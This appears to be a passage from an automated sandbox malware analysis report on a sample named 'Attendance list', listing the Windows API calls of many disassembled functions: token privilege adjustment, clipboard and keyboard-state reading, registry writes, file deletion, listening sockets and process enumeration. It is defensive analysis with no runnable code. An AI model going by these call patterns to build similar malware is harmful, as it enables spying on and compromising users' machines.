                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 4125248594-2988720461
                        APIs
                          • Part of subcall function 00918CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00918D0D
                          • Part of subcall function 00918CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00918D3A
                          • Part of subcall function 00918CC3: GetLastError.KERNEL32 ref: 00918D47
                        • _memset.LIBCMT ref: 0091889B
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009188ED
                        • CloseHandle.KERNEL32(?), ref: 009188FE
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00918915
                        • GetProcessWindowStation.USER32 ref: 0091892E
                        • SetProcessWindowStation.USER32(00000000), ref: 00918938
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00918952
                          • Part of subcall function 00918713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00918851), ref: 00918728
                          • Part of subcall function 00918713: CloseHandle.KERNEL32(?,?,00918851), ref: 0091873A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                        • String ID: $default$winsta0
                        • API String ID: 2063423040-1027155976
                        APIs
                        • OpenClipboard.USER32(0094F910), ref: 00934284
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00934292
                        • GetClipboardData.USER32(0000000D), ref: 0093429A
                        • CloseClipboard.USER32 ref: 009342A6
                        • GlobalLock.KERNEL32(00000000), ref: 009342C2
                        • CloseClipboard.USER32 ref: 009342CC
                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 009342E1
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 009342EE
                        • GetClipboardData.USER32(00000001), ref: 009342F6
                        • GlobalLock.KERNEL32(00000000), ref: 00934303
                        • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00934337
                        • CloseClipboard.USER32 ref: 00934447
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                        • String ID:
                        • API String ID: 3222323430-0
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 0092C9F8
                        • FindClose.KERNEL32(00000000), ref: 0092CA4C
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0092CA71
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0092CA88
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0092CAAF
                        • __swprintf.LIBCMT ref: 0092CAFB
                        • __swprintf.LIBCMT ref: 0092CB3E
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                        • __swprintf.LIBCMT ref: 0092CB92
                          • Part of subcall function 008E38D8: __woutput_l.LIBCMT ref: 008E3931
                        • __swprintf.LIBCMT ref: 0092CBE0
                          • Part of subcall function 008E38D8: __flsbuf.LIBCMT ref: 008E3953
                          • Part of subcall function 008E38D8: __flsbuf.LIBCMT ref: 008E396B
                        • __swprintf.LIBCMT ref: 0092CC2F
                        • __swprintf.LIBCMT ref: 0092CC7E
                        • __swprintf.LIBCMT ref: 0092CCCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                        • API String ID: 3953360268-2428617273
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0092F221
                        • _wcscmp.LIBCMT ref: 0092F236
                        • _wcscmp.LIBCMT ref: 0092F24D
                        • GetFileAttributesW.KERNEL32(?), ref: 0092F25F
                        • SetFileAttributesW.KERNEL32(?,?), ref: 0092F279
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0092F291
                        • FindClose.KERNEL32(00000000), ref: 0092F29C
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0092F2B8
                        • _wcscmp.LIBCMT ref: 0092F2DF
                        • _wcscmp.LIBCMT ref: 0092F2F6
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0092F308
                        • SetCurrentDirectoryW.KERNEL32(0097A5A0), ref: 0092F326
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0092F330
                        • FindClose.KERNEL32(00000000), ref: 0092F33D
                        • FindClose.KERNEL32(00000000), ref: 0092F34F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1803514871-438819550
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00940BDE
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0094F910,00000000,?,00000000,?,?), ref: 00940C4C
                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00940C94
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00940D1D
                        • RegCloseKey.ADVAPI32(?), ref: 0094103D
                        • RegCloseKey.ADVAPI32(00000000), ref: 0094104A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Close$ConnectCreateRegistryValue
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 536824911-966354055
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0092F37E
                        • _wcscmp.LIBCMT ref: 0092F393
                        • _wcscmp.LIBCMT ref: 0092F3AA
                          • Part of subcall function 009245C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009245DC
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0092F3D9
                        • FindClose.KERNEL32(00000000), ref: 0092F3E4
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0092F400
                        • _wcscmp.LIBCMT ref: 0092F427
                        • _wcscmp.LIBCMT ref: 0092F43E
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0092F450
                        • SetCurrentDirectoryW.KERNEL32(0097A5A0), ref: 0092F46E
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0092F478
                        • FindClose.KERNEL32(00000000), ref: 0092F485
                        • FindClose.KERNEL32(00000000), ref: 0092F497
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 1824444939-438819550
                        APIs
                          • Part of subcall function 0091874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00918766
                          • Part of subcall function 0091874A: GetLastError.KERNEL32(?,0091822A,?,?,?), ref: 00918770
                          • Part of subcall function 0091874A: GetProcessHeap.KERNEL32(00000008,?,?,0091822A,?,?,?), ref: 0091877F
                          • Part of subcall function 0091874A: HeapAlloc.KERNEL32(00000000,?,0091822A,?,?,?), ref: 00918786
                          • Part of subcall function 0091874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0091879D
                          • Part of subcall function 009187E7: GetProcessHeap.KERNEL32(00000008,00918240,00000000,00000000,?,00918240,?), ref: 009187F3
                          • Part of subcall function 009187E7: HeapAlloc.KERNEL32(00000000,?,00918240,?), ref: 009187FA
                          • Part of subcall function 009187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00918240,?), ref: 0091880B
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0091825B
                        • _memset.LIBCMT ref: 00918270
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0091828F
                        • GetLengthSid.ADVAPI32(?), ref: 009182A0
                        • GetAce.ADVAPI32(?,00000000,?), ref: 009182DD
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009182F9
                        • GetLengthSid.ADVAPI32(?), ref: 00918316
                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00918325
                        • HeapAlloc.KERNEL32(00000000), ref: 0091832C
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0091834D
                        • CopySid.ADVAPI32(00000000), ref: 00918354
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00918385
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009183AB
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009183BF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                        • String ID:
                        • API String ID: 3996160137-0
                        Strings
                        Similarity
                        • API ID:
                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                        • API String ID: 0-4052911093
                        APIs
                          • Part of subcall function 009410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00940038,?,?), ref: 009410BC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00940737
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009407D6
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0094086E
                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00940AAD
                        • RegCloseKey.ADVAPI32(00000000), ref: 00940ABA
                        Similarity
                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                        • String ID:
                        • API String ID: 1240663315-0
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00920241
                        • GetAsyncKeyState.USER32(000000A0), ref: 009202C2
                        • GetKeyState.USER32(000000A0), ref: 009202DD
                        • GetAsyncKeyState.USER32(000000A1), ref: 009202F7
                        • GetKeyState.USER32(000000A1), ref: 0092030C
                        • GetAsyncKeyState.USER32(00000011), ref: 00920324
                        • GetKeyState.USER32(00000011), ref: 00920336
                        • GetAsyncKeyState.USER32(00000012), ref: 0092034E
                        • GetKeyState.USER32(00000012), ref: 00920360
                        • GetAsyncKeyState.USER32(0000005B), ref: 00920378
                        • GetKeyState.USER32(0000005B), ref: 0092038A
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        APIs
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • CoInitialize.OLE32 ref: 00938718
                        • CoUninitialize.OLE32 ref: 00938723
                        • CoCreateInstance.OLE32(?,00000000,00000017,00952BEC,?), ref: 00938783
                        • IIDFromString.OLE32(?,?), ref: 009387F6
                        • VariantInit.OLEAUT32(?), ref: 00938890
                        • VariantClear.OLEAUT32(?), ref: 009388F1
                        Strings
                        Similarity
                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        • API String ID: 834269672-1287834457
                        APIs
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        • API String ID: 1737998785-0
                        APIs
                          • Part of subcall function 008C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C48A1,?,?,008C37C0,?), ref: 008C48CE
                          • Part of subcall function 00924CD3: GetFileAttributesW.KERNEL32(?,00923947), ref: 00924CD4
                        • FindFirstFileW.KERNEL32(?,?), ref: 00923ADF
                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00923B87
                        • MoveFileW.KERNEL32(?,?), ref: 00923B9A
                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00923BB7
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00923BD9
                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00923BF5
                        Strings
                        Similarity
                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                        • String ID: \*.*
                        • API String ID: 4002782344-1173974218
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0092F6AB
                        • Sleep.KERNEL32(0000000A), ref: 0092F6DB
                        • _wcscmp.LIBCMT ref: 0092F6EF
                        • _wcscmp.LIBCMT ref: 0092F70A
                        • FindNextFileW.KERNEL32(?,?), ref: 0092F7A8
                        • FindClose.KERNEL32(00000000), ref: 0092F7BE
                        Strings
                        Similarity
                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                        • String ID: *.*
                        • API String ID: 713712311-438819550
                        Strings
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                        • API String ID: 0-1546025612
                        APIs
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        APIs
                          • Part of subcall function 00918CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00918D0D
                          • Part of subcall function 00918CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00918D3A
                          • Part of subcall function 00918CC3: GetLastError.KERNEL32 ref: 00918D47
                        • ExitWindowsEx.USER32(?,00000000), ref: 0092549B
                        Strings
                        Similarity
                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                        • String ID: $@$SeShutdownPrivilege
                        • API String ID: 2234035333-194228
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009365EF
                        • WSAGetLastError.WSOCK32(00000000), ref: 009365FE
                        • bind.WSOCK32(00000000,?,00000010), ref: 0093661A
                        • listen.WSOCK32(00000000,00000005), ref: 00936629
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936643
                        • closesocket.WSOCK32(00000000,00000000), ref: 00936657
                        Similarity
                        • API ID: ErrorLast$bindclosesocketlistensocket
                        • String ID:
                        • API String ID: 1279440585-0
                        APIs
                          • Part of subcall function 008E0FF6: std::exception::exception.LIBCMT ref: 008E102C
                          • Part of subcall function 008E0FF6: __CxxThrowException@8.LIBCMT ref: 008E1041
                        • _memmove.LIBCMT ref: 0091062F
                        • _memmove.LIBCMT ref: 00910744
                        • _memmove.LIBCMT ref: 009107EB
                        Similarity
                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                        • String ID:
                        • API String ID: 1300846289-0
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 008C19FA
                        • GetSysColor.USER32(0000000F), ref: 008C1A4E
                        • SetBkColor.GDI32(?,00000000), ref: 008C1A61
                          • Part of subcall function 008C1290: DefDlgProcW.USER32(?,00000020,?), ref: 008C12D8
                        Similarity
                        • API ID: ColorProc$LongWindow
                        • String ID:
                        • API String ID: 3744519093-0
                        APIs
                          • Part of subcall function 009380A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009380CB
                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00936AB1
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936ADA
                        • bind.WSOCK32(00000000,?,00000010), ref: 00936B13
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936B20
                        • closesocket.WSOCK32(00000000,00000000), ref: 00936B34
                        Similarity
                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 99427753-0
                        • Opcode ID: 1c4d90ecd499f2481df5b61edff4c29f3c043c20ac8b011a1bbebd64454f3cb2
                        • Instruction ID: 1edb477add6617dc484eb431fed7be87fa7e036aa054323d81ad60aa27beb9f1
                        • Opcode Fuzzy Hash: 1c4d90ecd499f2481df5b61edff4c29f3c043c20ac8b011a1bbebd64454f3cb2
                        • Instruction Fuzzy Hash: 5141B475740610AFEB10AF28DC86F6E77B8EB45710F04809CF95AEB3C2CA749D008B92
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                        • String ID:
                        • API String ID: 292994002-0
                        • Opcode ID: 49598160a179b7cc00052ad9369bc7b519c0fe21473dbb08568ecf0ae8d5c099
                        • Instruction ID: 7b6467cd32b7ef001cefb90b7ed93747dec21876d0939680970e2237ab07f106
                        • Opcode Fuzzy Hash: 49598160a179b7cc00052ad9369bc7b519c0fe21473dbb08568ecf0ae8d5c099
                        • Instruction Fuzzy Hash: F811D0313009216FE7212F66DC18F2B7BACFF45720B434428F806D3252CB30D901CAA5
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00901D88,?), ref: 0093C312
                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0093C324
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                        • API String ID: 2574300362-1816364905
                        • Opcode ID: 27ae0f8aafcde372013bba0e1dadc548ca9022ec6bccca25621b1da19fb8def0
                        • Instruction ID: a1135e500a4c6368ecd962c9faf6e58525dec544741dc2f2a6ebbbb587612bae
                        • Opcode Fuzzy Hash: 27ae0f8aafcde372013bba0e1dadc548ca9022ec6bccca25621b1da19fb8def0
                        • Instruction Fuzzy Hash: BCE012B4614B13CFDB205F65D814E5676D8EF4E799F80C439E999E2250E770D840CF60
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __itow__swprintf
                        • String ID:
                        • API String ID: 674341424-0
                        • Opcode ID: 7ce933009fc02ec253452de2338e696faf0067e19b41e02551392324c84e7334
                        • Instruction ID: 5335fbdb91815af2dfa993ad9ecfcb95249d517bfa6b29390ae491bdb3a267bf
                        • Opcode Fuzzy Hash: 7ce933009fc02ec253452de2338e696faf0067e19b41e02551392324c84e7334
                        • Instruction Fuzzy Hash: E12255716083019FD724DB68D891B6AB7E5FB84314F004A2EF49A97391DB71EA44CB93
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0093F151
                        • Process32FirstW.KERNEL32(00000000,?), ref: 0093F15F
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                        • Process32NextW.KERNEL32(00000000,?), ref: 0093F21F
                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0093F22E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                        • String ID:
                        • API String ID: 2576544623-0
                        • Opcode ID: 8199327c7cb9fe4d44ca1e0a3165897b953cc0b8475e334c871a7adb75d9af02
                        • Instruction ID: 1b7ad6b3231f5a56ca69bddfe26003eb5b961281f5fdce2294fd7e7685b98ba2
                        • Opcode Fuzzy Hash: 8199327c7cb9fe4d44ca1e0a3165897b953cc0b8475e334c871a7adb75d9af02
                        • Instruction Fuzzy Hash: 03513771508711ABD310EF24D895F6BBBE8FF98710F14482DF596D62A1EB70E908CB92
                        APIs
                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009240D1
                        • _memset.LIBCMT ref: 009240F2
                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00924144
                        • CloseHandle.KERNEL32(00000000), ref: 0092414D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CloseControlCreateDeviceFileHandle_memset
                        • String ID:
                        • API String ID: 1157408455-0
                        • Opcode ID: f477b4374fe326d6a5f3f263f163d6f0c189712a82f40c75dbf942995fcb2691
                        • Instruction ID: f6880f49ccc4346ac4118f85faec7765d5b835ac561b4db477ee163e331b9549
                        • Opcode Fuzzy Hash: f477b4374fe326d6a5f3f263f163d6f0c189712a82f40c75dbf942995fcb2691
                        • Instruction Fuzzy Hash: 2711EB759012387AD7305BA5AC4DFABBB7CEF45760F1041A6F908D7180D6744E808BA4
                        APIs
                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0091EB19
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
